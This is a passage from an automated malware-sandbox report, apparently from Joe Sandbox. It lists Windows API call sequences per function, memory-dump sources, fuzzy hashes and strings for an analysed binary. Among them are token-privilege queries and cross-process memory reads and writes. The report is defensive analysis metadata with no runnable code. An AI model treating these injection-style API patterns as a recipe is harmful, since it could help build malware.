• GetTokenInformation.ADVAPI32(?,00000002(TokenGroups),?,00000000,?), ref: 001AB7A5
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001AB7AF
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001AB7BE
• RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 001AB7C5
• GetTokenInformation.ADVAPI32(?,00000002(TokenGroups),00000000,?,?,?,00000002,?,00000000,?), ref: 001AB7DB
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: HeapInformationToken$AllocateErrorLastProcess
• String ID:
• API String ID: 47921759-0
• Opcode ID: 60474c0b8637d868e8f11c8444ab4c14569defe3854e3516e6170c201104bb45
• Instruction ID: bb08f5381bd0a07a7cb656f42a7359f426147129c7de0e39d6be07e31ac12819
• Opcode Fuzzy Hash: 60474c0b8637d868e8f11c8444ab4c14569defe3854e3516e6170c201104bb45
• Instruction Fuzzy Hash: 4EF04FB52442446FEB101FA5ACC9E7B3BAEFF86755F104019FA45C7191DBA09C81DA60
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 001AB806
• GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 001AB810
• GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 001AB81F
• RtlAllocateHeap.NTDLL(00000000,?,TokenPrivileges), ref: 001AB826
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 001AB83C
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: HeapInformationToken$AllocateErrorLastProcess
• String ID:
• API String ID: 47921759-0
• Opcode ID: 38940cd281e757affdcac902b74e43312d23463340ebfed04620033e85bc757f
• Instruction ID: a290046eb05ae106ff7386f662678ff15801e8ebde1bbdc50d3f038fab01c7b0
• Opcode Fuzzy Hash: 38940cd281e757affdcac902b74e43312d23463340ebfed04620033e85bc757f
• Instruction Fuzzy Hash: F2F04979204204AFEB211FA9FCC8E7B3B6EFF4A754F004029FA45C7152CB689881DA60
APIs
• GetDlgItem.USER32(?,000003E9), ref: 001AFA8F
• GetWindowTextW.USER32(00000000,?,00000100), ref: 001AFAA6
• MessageBeep.USER32(00000000), ref: 001AFABE
• KillTimer.USER32(?,0000040A), ref: 001AFADA
• EndDialog.USER32(?,00000001), ref: 001AFAF4
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: e967c4e0804df7dcb057053291e667a969ad411c37e5cbed83ab9b096486b877
• Instruction ID: 87e080543a988ad0d512125447da4bbbf41a2b6a782bda58d990d6f4fcf80836
• Opcode Fuzzy Hash: e967c4e0804df7dcb057053291e667a969ad411c37e5cbed83ab9b096486b877
• Instruction Fuzzy Hash: 0F01A934500704ABEB249B50ED4EBF677B9BF01709F0401ADB14BA54E0DBF0A986CF40
APIs
• EndPath.GDI32(?), ref: 0018B526
• StrokeAndFillPath.GDI32(?,?,001EF583,00000000,?), ref: 0018B542
• SelectObject.GDI32(?,00000000), ref: 0018B555
• DeleteObject.GDI32 ref: 0018B568
• StrokePath.GDI32(?), ref: 0018B583
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: 085b162d219420c01d25c1a530bd29913ad37a7384ff6ad1f3b8152279e7e2ed
• Instruction ID: a0152073d48b1e95ec3cdbaa7bd50a9c6bc0e1175e97b454e9ac4245dcb62f5b
• Opcode Fuzzy Hash: 085b162d219420c01d25c1a530bd29913ad37a7384ff6ad1f3b8152279e7e2ed
• Instruction Fuzzy Hash: F8F0C430109604ABEB156F25FD4CB797FE6AB01322F188215F4A9445F0CB348AA6DF18
APIs
• CoInitialize.OLE32(00000000), ref: 001BFAB2
• CoCreateInstance.COMBASE(001FDA7C,00000000,00000001,001FD8EC,?), ref: 001BFACA
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
• CoUninitialize.COMBASE ref: 001BFD2D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 2683427295-24824748
                                                                                                                              • Opcode ID: e98ef700266d86176c4aa92be53184d46148fa59c873b11ff23ade513f37e910
                                                                                                                              • Instruction ID: 8bf35bf061bb37f4785ae14fd1d2bee3ae1bc1d34efd79a616b4f219bb2afcf3
                                                                                                                              • Opcode Fuzzy Hash: e98ef700266d86176c4aa92be53184d46148fa59c873b11ff23ade513f37e910
                                                                                                                              • Instruction Fuzzy Hash: CAA14971504305AFC301EFA4C891EABB7EDEFA8714F40891CF55997192EB70EA09CB92
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #$+
                                                                                                                              • API String ID: 0-2552117581
                                                                                                                              • Opcode ID: 4ac122c8884b3e605e06035a2084a6c3f71b528f704264c49b0197911c814450
                                                                                                                              • Instruction ID: de97b15297f757ded4b0e49997caa65cba965370f3051d4f6f7aa9a198712cb1
                                                                                                                              • Opcode Fuzzy Hash: 4ac122c8884b3e605e06035a2084a6c3f71b528f704264c49b0197911c814450
                                                                                                                              • Instruction Fuzzy Hash: 76512F351047969FDF29EFA9E444AFE3BB4AF26310F244051F9919B2E0D7349E82CB20
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0020DC40,?,0000000F,0000000C,00000016,0020DC40,?), ref: 001B507B
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 0017B8A7: _memmove.LIBCMT ref: 0017B8FB
                                                                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001B50FB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                              • String ID: REMOVE$THIS
                                                                                                                              • API String ID: 2528338962-776492005
                                                                                                                              • Opcode ID: 529e21e2804dc0bdb540474888a576a0bd1a1d9059c45a461f00aeef34f1002c
                                                                                                                              • Instruction ID: 2b18c65a744431e0a3fa5072393f76d6b264ac0281799af1fd0a59228d0cf809
                                                                                                                              • Opcode Fuzzy Hash: 529e21e2804dc0bdb540474888a576a0bd1a1d9059c45a461f00aeef34f1002c
                                                                                                                              • Instruction Fuzzy Hash: FC417F35A00609AFCF05EF58C881BEEB7B6FF58314F048069E95AAB252DB74DD41CB51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001AC9FE,?,?,00000034,00000800,?,00000034), ref: 001B4D6B
                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001ACFC9
                                                                                                                                • Part of subcall function 001B4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001ACA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 001B4D36
                                                                                                                                • Part of subcall function 001B4C65: GetWindowThreadProcessId.USER32(?,?), ref: 001B4C90
                                                                                                                                • Part of subcall function 001B4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 001B4CA0
                                                                                                                                • Part of subcall function 001B4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 001B4CB6
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001AD036
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001AD083
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                              • Opcode ID: ef9b48b719abed919f881542a7a90f6d63117f0c7ddd700d55d18dfc824fb3f8
                                                                                                                              • Instruction ID: 398729063d3d5d8dc9b4428cc643ae93d297720ccf9329275bf641d6122e9308
                                                                                                                              • Opcode Fuzzy Hash: ef9b48b719abed919f881542a7a90f6d63117f0c7ddd700d55d18dfc824fb3f8
                                                                                                                              • Instruction Fuzzy Hash: 4F412A76900218AFDB10DFA4DD85AEEBBB8AF59700F108095FA45BB181DB706E85CB61
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0020DBF0,00000000,?,?,?,?), ref: 001DA4E6
                                                                                                                              • GetWindowLongW.USER32 ref: 001DA503
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001DA513
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long
                                                                                                                              • String ID: SysTreeView32
                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                              • Opcode ID: a0dc50e3077df676a20a9f40fdab46f3f9e7c518929a56b2f5f560104dc3dbb4
                                                                                                                              • Instruction ID: 5ba62c2013f2c99d9ad632a4d82f494d6acd730324d0324de999a535b048d70a
                                                                                                                              • Opcode Fuzzy Hash: a0dc50e3077df676a20a9f40fdab46f3f9e7c518929a56b2f5f560104dc3dbb4
                                                                                                                              • Instruction Fuzzy Hash: 8531B031200205AFDF119F38DC45BEA7BA9EF49328F244726F975932E1D770E9619B90
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001DA74F
                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001DA75D
                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001DA764
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                              • String ID: msctls_updown32
                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                              • Opcode ID: 3162a068b3833d77be848d9fb66afefcc6f6cb2509dd86772d14d691ed9cd724
                                                                                                                              • Instruction ID: 64ef9b32fe556a4de80b042303b4dd381d4a650430e3fe41db9f8311717f8af4
                                                                                                                              • Opcode Fuzzy Hash: 3162a068b3833d77be848d9fb66afefcc6f6cb2509dd86772d14d691ed9cd724
                                                                                                                              • Instruction Fuzzy Hash: A32151B5600205AFEB10DF64DCC5EBB37ADEF5A394B54045AFA019B351C771EC11CAA1
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001D983D
                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001D984D
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001D9872
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 1c2209fbfe1614c59fb7e8477936daaef6ef884b6256ebc7bf7438c49c9b5f73
• Instruction ID: a4d46c05ec9ea6820df62e9ae029f2d8937ec6f017d60d6d055a6dde7308d65c
• Opcode Fuzzy Hash: 1c2209fbfe1614c59fb7e8477936daaef6ef884b6256ebc7bf7438c49c9b5f73
• Instruction Fuzzy Hash: F821C632610118BFEF119F54DC85FBB3BAAEF8AB64F118125F9059B290C7719C51DBA0
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001DA27B
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001DA290
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001DA29D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 0f907097dc55cb3ed3bf5fc97773f21e477f73278dd768b6b0800694fe5f54ee
• Instruction ID: 3cd414c8c8fb7e07ab9f53214da1e3b6a429da8fa683e5b75be6343749d61cca
• Opcode Fuzzy Hash: 0f907097dc55cb3ed3bf5fc97773f21e477f73278dd768b6b0800694fe5f54ee
• Instruction Fuzzy Hash: B6113A71200308BFEF209F61CC46FA73BA8EF88B54F014119FA5196190D372D851CB60
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00192F11,00000000), ref: 00192F79
• GetProcAddress.KERNEL32(00000000), ref: 00192F80
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 2574300362-340411864
• Opcode ID: 75f7fd5dd38e2e525a1f9a0e7475e0150ef40589442fdb2f9032c5d1113d085d
• Instruction ID: dc6f5bcfe6ff5c18520caf4ecfe2729154f8e5e878642308e6fbcab86eb22f17
• Opcode Fuzzy Hash: 75f7fd5dd38e2e525a1f9a0e7475e0150ef40589442fdb2f9032c5d1113d085d
• Instruction Fuzzy Hash: 12E01A70694304ABDF205F71FC9EB353666A700706F000064F246D24A0DBB58050EF19
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00192F4E), ref: 0019304E
• GetProcAddress.KERNEL32(00000000), ref: 00193055
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 2574300362-2819208100
• Opcode ID: 1419a0aa7544314d35e38110e89d17e7e11c940fe2a4f2591d31152c84ba93f5
• Instruction ID: 47d1b12a00f58eb71336e4c46c604a1d1cd310b36e68388b9a7dba47aa82888c
• Opcode Fuzzy Hash: 1419a0aa7544314d35e38110e89d17e7e11c940fe2a4f2591d31152c84ba93f5
• Instruction Fuzzy Hash: 80E0ECB0744304ABDB315F61FD5DB353A75B700702F140054F24ED24B0CBB54550EB29
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: c501eb5055e5d5ca9b9f85540406b11e32c73c30130b5b9cab2e0587982378aa
• Instruction ID: 3fef2ac9030151d99e26cefad4397572a8eb264d16afac6112b426a2ca26dcc1
• Opcode Fuzzy Hash: c501eb5055e5d5ca9b9f85540406b11e32c73c30130b5b9cab2e0587982378aa
• Instruction Fuzzy Hash: 3DE0EC7180C45CFACF1896929D869BF72BCAB48300F5148A2B91692000D7359B54AB21
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,001D20EC,?,001CF751), ref: 001D2104
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 001D2116
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
